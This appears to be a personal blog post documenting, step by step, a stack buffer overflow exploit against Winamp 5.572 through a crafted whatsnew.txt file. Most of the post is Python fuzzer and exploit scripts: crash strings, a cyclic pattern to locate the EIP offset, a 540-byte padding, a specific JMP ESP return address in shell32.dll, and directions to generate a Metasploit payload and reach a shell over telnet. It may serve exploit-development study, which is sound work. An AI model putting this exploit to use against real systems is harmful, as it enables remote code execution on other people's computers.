#!/usr/bin/python
nama="winampFLV.swf"
coba="\x41"*600000
file=open(nama,"w")
file.write(coba)
print("testing...")
file.close()
try to load the fuzzer
the application became crash...but after i run it again using ollydbg, the EIP not overwrite.
then i try to make it crash use the skin
try to make fuzzer use file mcvcore.maki
#!/usr/bin/python
nama="mcvcore.maki"
coba="\x41"*600000
file=open(nama,"w")
file.write(coba)
print("testing...")
file.close()
then copy and paste the file in C:\Program Files\Winamp\Skins\coba\scripts
try to change the skin
the application will be crash like this..
but, after i try use ollydbg, the application can't crash.
then, i've tried to make fuzzer use config.xml and skin.xml... but it not work...
and i've tried to make fuzzer use whatsnew.txt too...
#!/usr/bin/python
nama="whatsnew.txt"
coba="\x41"*60000
file=open(nama,"w")
file.write(coba)
print("testing...")
file.close()
but it not work.
and now i try to add the header for the version of Winamp into the fuzzer like this
#!/usr/bin/python
nama="whatsnew.txt"
coba="Winamp 5.572" + "\x41"*1000
file=open(nama,"w")
file.write(coba)
print("testing...")
file.close()
then the application will be crash and the EIP will be overwrite by character "\x41"
after that i will try to create patten 1000 and copy it into the fuzzer
#!/usr/bin/python
nama="whatsnew.txt"
coba="Winamp 5.572" + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
file=open(nama,"w")
file.write(coba)
print("testing...")
file.close()
then use pattern offset to know where is chracter that overwrite the EIP
next step, i'll try to control the EIP
#!/usr/bin/python
nama="whatsnew.txt"
coba="Winamp 5.572"
coba+="\x90"*540
coba+="\xDD\xCC\xBB\xAA"
coba+="\x90"*(1000-len(coba))
file=open(nama,"w")
file.write(coba)
print("testing...")
file.close()
search the stepping stone ..
view --> executables modules and double click on shell32.dll and the right click --> search for --> command and type JMP ESP
so we can see the address of JMP ESP
don't forget to breakpoint the address of JMP ESP to make sure that the address have been read by EIP.
then edit the fuzzer and use address of JMP ESP.
#!/usr/bin/python
nama="whatsnew.txt"
coba="Winamp 5.572"
coba+="\x90"*540
coba+="\xD7\x30\x9D\x7C"
coba+="\x90"*(1000-len(coba))
file=open(nama,"w")
file.write(coba)
print("testing...")
file.close()
now we can see the Ollydbg has stop process Winamp when access address of JMP ESP.
now make the payload
open terminal and type this
root@bt:/pentest/exploits/framework2# ./msfweb
after that open browser to generate the payload.
then copy the payload into fuzzer
so the application will be crash
then try to access the system using telnet
Alhamdulillah ... :D
No comments:
Post a Comment